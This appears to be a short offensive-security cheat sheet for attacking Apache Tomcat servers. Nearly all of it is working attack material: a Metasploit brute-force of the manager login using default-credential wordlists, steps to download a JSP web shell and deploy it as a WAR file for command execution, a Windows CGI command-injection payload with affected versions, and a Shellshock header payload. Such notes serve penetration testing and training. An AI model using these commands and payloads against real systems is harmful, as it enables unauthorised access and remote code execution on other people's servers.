Version#

curl -s "http://$target/docs/" | grep -i tomcat

Login brute force#

Metasploit uses the following wordlists:

  • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
  • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS <IP>
set VHOST <Domain name>
set RPORT <http(s) port>
set stop_on_success true
set LHOST tun0

RCE#

Upload malicious WAR file#

Browse to /manager/html and enter credential

curl https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp -O
zip -r backup.war cmd.jsp

Then upload the .war file -> click on backup (the app we uploaded) -> cmd.jsp?cmd=id

Or:

curl "http://$target/backup/cmd.jsp?cmd=id"

Tomcat CGI command injection#

Versions: 9.0.0.M1 -> 9.0.17, 8.5.0 -> 8.5.39, 7.0.0 -> 7.0.93

Affects Tomcat running on Windows that enabled enableCmdLineArguments

We add ?&, which will be interpreted as webcome.bat &

curl -s "http://$target/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe"

Tomcat CGI Shellshock#

Bash version: below 4.3

I don’t know how this shit work

curl -H 'User-Agent: () { :; }; echo; echo; /bin/whoami' "http://$target/cgi-bin/access.cgi"
Backward Splunk Word Press Forward